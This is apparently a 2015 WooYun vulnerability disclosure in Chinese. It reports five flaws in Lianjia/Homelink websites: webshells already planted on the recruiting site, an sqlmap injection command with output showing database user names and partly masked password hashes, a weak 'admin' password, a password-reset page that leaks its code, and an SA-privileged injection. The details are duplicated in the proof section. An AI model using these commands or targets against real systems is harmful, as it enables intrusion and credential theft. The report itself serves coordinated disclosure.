漏洞概要
关注数(24)
关注此漏洞
漏洞标题:链家房地产公司漏洞合集(命令执行/SSRF/SQL注入/逻辑漏洞等)
提交时间:2015-11-09 18:24
修复时间:2015-12-24 18:56
公开时间:2015-12-24 18:56
漏洞类型:命令执行
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
Tags标签:
无
漏洞详情
披露状态:
2015-11-09: 细节已通知厂商并且等待厂商处理中
2015-11-09: 厂商已经确认,细节仅向厂商公开
2015-11-19: 细节向核心白帽子及相关领域专家公开
2015-11-29: 细节向普通白帽子公开
2015-12-09: 细节向实习白帽子公开
2015-12-24: 细节向公众公开
简要描述:
链家房地产公司漏洞合集(二)
详细说明:
1、链家招聘系统命令执行漏洞
http://www.homelinkhr.com/view_initIndexPageForCustomer.action
http://www.homelinkhr.com/one8.jsp
http://www.homelinkhr.com/cmd.jsp
被挂了一堆这种东西
就简单的看了下,其他网段没注意,修复了就好。
——————————————————————————————————————————
2、链家招聘平台SQL注入漏洞
Sqlmap -u "http://www.homelinkhr.com/view_getDetailInfoForCustomer.action?type=DD080302"
[19:14:24] [INFO] retrieved: "root","*****19DAAC4D4D97FB5C51731117291FE0A4D139"
[19:14:25] [INFO] retrieved: "zabbix","*****4D7D88CD046ECA02A80393B7780A63E7E...
[19:14:25] [INFO] retrieved: "hruser","*****19DAAC4D4D97FB5C51731117291FE0A4D139
密码我打码了。
——————————————————————————————————————
3、链家某投票网站注入漏洞+弱口令
http://homelinktc.sinaapp.com/admin.php?type=modify&id=3
弱口令 admin
——————————————————————————————————————
4、开票吧逻辑漏洞
http://kaipiaoba.homelink.com.cn/ri/system/logout.action
找回密码,网页自动返回了验证码。
——————————————————————————————————
5、培训系统注入漏洞,百密一疏。
注入
http://tc.homelink.com.cn/Shopmall/PurchaseItems01.aspx
权限SA,路径也有了,写个shell应该不难,参照:
WooYun: 链家某站由一个弱口令导致一次简单内网漫游(修复不彻底)
WooYun: 链家某系统SQL注入未修复彻底导致再次Getshell
漏洞证明:
1、链家招聘系统命令执行漏洞
http://www.homelinkhr.com/view_initIndexPageForCustomer.action
http://www.homelinkhr.com/one8.jsp
http://www.homelinkhr.com/cmd.jsp
被挂了一堆这种东西
就简单的看了下,其他网段没注意,修复了就好。
——————————————————————————————————————————
2、链家招聘平台SQL注入漏洞
Sqlmap -u "http://www.homelinkhr.com/view_getDetailInfoForCustomer.action?type=DD080302"
[19:14:24] [INFO] retrieved: "root","*****19DAAC4D4D97FB5C51731117291FE0A4D139"
[19:14:25] [INFO] retrieved: "zabbix","*****4D7D88CD046ECA02A80393B7780A63E7E...
[19:14:25] [INFO] retrieved: "hruser","*****19DAAC4D4D97FB5C51731117291FE0A4D139
密码我打码了。
——————————————————————————————————————
3、链家某投票网站注入漏洞+弱口令
http://homelinktc.sinaapp.com/admin.php?type=modify&id=3
弱口令 admin
——————————————————————————————————————
4、开票吧逻辑漏洞
http://kaipiaoba.homelink.com.cn/ri/system/logout.action
找回密码,网页自动返回了验证码。
——————————————————————————————————
5、培训系统注入漏洞,百密一疏。
注入
http://tc.homelink.com.cn/Shopmall/PurchaseItems01.aspx
权限SA,路径也有了,写个shell应该不难,参照:
WooYun: 链家某站由一个弱口令导致一次简单内网漫游(修复不彻底)
WooYun: 链家某系统SQL注入未修复彻底导致再次Getshell
修复方案:
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:10
确认时间:2015-11-09 18:54
厂商回复:
确认,谢谢。
最新状态:
暂无
漏洞评价:
评论